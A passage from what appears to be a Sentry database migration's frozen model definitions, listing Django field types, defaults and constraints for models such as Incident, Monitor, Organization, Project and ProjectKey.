'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'state': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'user_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.groupsubscription': {
'Meta': {'unique_together': "(('group', 'user'),)", 'object_name': 'GroupSubscription', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'subscription_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'subscription_set'", 'to': "orm['sentry.Project']"}),
'reason': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project_id', 'group_id', 'key'),)", 'object_name': 'GroupTagKey', 'index_together': '()'},
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('group_id', 'key', 'value'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'", 'index_together': "(('project_id', 'key', 'value', 'last_seen'),)"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.grouptombstone': {
'Meta': {'unique_together': '()', 'object_name': 'GroupTombstone', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'unique': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.identity': {
'Meta': {'unique_together': "(('idp', 'external_id'), ('idp', 'user'))", 'object_name': 'Identity', 'index_together': '()'},
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'idp': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.IdentityProvider']"}),
'scopes': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.identityprovider': {
'Meta': {'unique_together': "(('type', 'external_id'),)", 'object_name': 'IdentityProvider', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.incident': {
'Meta': {'unique_together': "(('organization', 'identifier'),)", 'object_name': 'Incident', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_closed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_detected': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'detection_uuid': ('sentry.db.models.fields.uuid.UUIDField', [], {'max_length': '32', 'null': 'True', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'incidents'", 'symmetrical': 'False', 'through': "orm['sentry.IncidentGroup']", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.IntegerField', [], {}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'incidents'", 'symmetrical': 'False', 'through': "orm['sentry.IncidentProject']", 'to': "orm['sentry.Project']"}),
'query': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {})
},
'sentry.incidentactivity': {
'Meta': {'unique_together': '()', 'object_name': 'IncidentActivity', 'index_together': '()'},
'comment': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_stats_snapshot': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.TimeSeriesSnapshot']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'previous_value': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'value': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.incidentgroup': {
'Meta': {'unique_together': "(('group', 'incident'),)", 'object_name': 'IncidentGroup', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'db_index': 'False'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"})
},
'sentry.incidentproject': {
'Meta': {'unique_together': "(('project', 'incident'),)", 'object_name': 'IncidentProject', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'db_index': 'False'})
},
'sentry.incidentseen': {
'Meta': {'unique_together': "(('user', 'incident'),)", 'object_name': 'IncidentSeen', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.integration': {
'Meta': {'unique_together': "(('provider', 'external_id'),)", 'object_name': 'Integration', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'metadata': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organizations': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationIntegration']", 'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectIntegration']", 'to': "orm['sentry.Project']"}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'})
},
'sentry.integrationexternalproject': {
'Meta': {'unique_together': "(('organization_integration_id', 'external_id'),)", 'object_name': 'IntegrationExternalProject', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'organization_integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'resolved_status': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'unresolved_status': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.latestrelease': {
'Meta': {'unique_together': "(('repository_id', 'environment_id'),)", 'object_name': 'LatestRelease', 'index_together': '()'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'deploy_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.lostpasswordhash': {
'Meta': {'unique_together': '()', 'object_name': 'LostPasswordHash', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.monitor': {
'Meta': {'unique_together': '()', 'object_name': 'Monitor', 'index_together': "(('type', 'next_checkin'),)"},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_checkin': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'next_checkin': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.monitorcheckin': {
'Meta': {'unique_together': '()', 'object_name': 'MonitorCheckIn', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'duration': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'location': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.MonitorLocation']", 'null': 'True'}),
'monitor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Monitor']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.monitorlocation': {
'Meta': {'unique_together': '()', 'object_name': 'MonitorLocation', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'unique_together': '()', 'object_name': 'Option', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'unique_together': '()', 'object_name': 'Organization', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationaccessrequest': {
'Meta': {'unique_together': "(('team', 'member'),)", 'object_name': 'OrganizationAccessRequest', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'member': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationavatar': {
'Meta': {'unique_together': '()', 'object_name': 'OrganizationAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Organization']"})
},
'sentry.organizationintegration': {
'Meta': {'unique_together': "(('organization', 'integration'),)", 'object_name': 'OrganizationIntegration', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'default_auth_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'member_set'", 'to': "orm['sentry.Organization']"}),
'role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMemberTeam']", 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'token_expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.organizationmemberteam': {
'Meta': {'unique_together': "(('team', 'organizationmember'),)", 'object_name': 'OrganizationMemberTeam', 'db_table': "'sentry_organizationmember_teams'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'organizationmember': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationonboardingtask': {
'Meta': {'unique_together': "(('organization', 'task'),)", 'object_name': 'OrganizationOnboardingTask', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'task': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.organizationoption': {
'Meta': {'unique_together': "(('organization', 'key'),)", 'object_name': 'OrganizationOption', 'db_table': "'sentry_organizationoptions'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.platformexternalissue': {
'Meta': {'unique_together': "(('group_id', 'service_type'),)", 'object_name': 'PlatformExternalIssue', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'display_name': ('django.db.models.fields.TextField', [], {}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'service_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'web_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'sentry.processingissue': {
'Meta': {'unique_together': "(('project', 'checksum', 'type'),)", 'object_name': 'ProcessingIssue', 'index_together': '()'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'db_index': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'sentry.project': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Project', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'first_event': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0', 'null': 'True'}),
'forced_color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'teams'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectTeam']", 'to': "orm['sentry.Team']"})
},
'sentry.projectavatar': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Project']"})
},
'sentry.projectbookmark': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectBookmark', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.projectcficachefile': {
'Meta': {'unique_together': "(('project', 'debug_file'),)", 'object_name': 'ProjectCfiCacheFile', 'index_together': '()'},
'cache_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'debug_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDebugFile']", 'on_delete': 'models.DO_NOTHING', 'db_column': "'dsym_file_id'"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.projectdebugfile': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectDebugFile', 'db_table': "'sentry_projectdsymfile'", 'index_together': "(('project', 'debug_id'), ('project', 'code_id'))"},
'code_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'cpu_name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'debug_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_column': "'uuid'"}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'})
},
'sentry.projectintegration': {
'Meta': {'unique_together': "(('project', 'integration'),)", 'object_name': 'ProjectIntegration', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.projectkey': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectKey', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'rate_limit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'rate_limit_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.projectownership': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectOwnership', 'index_together': '()'},
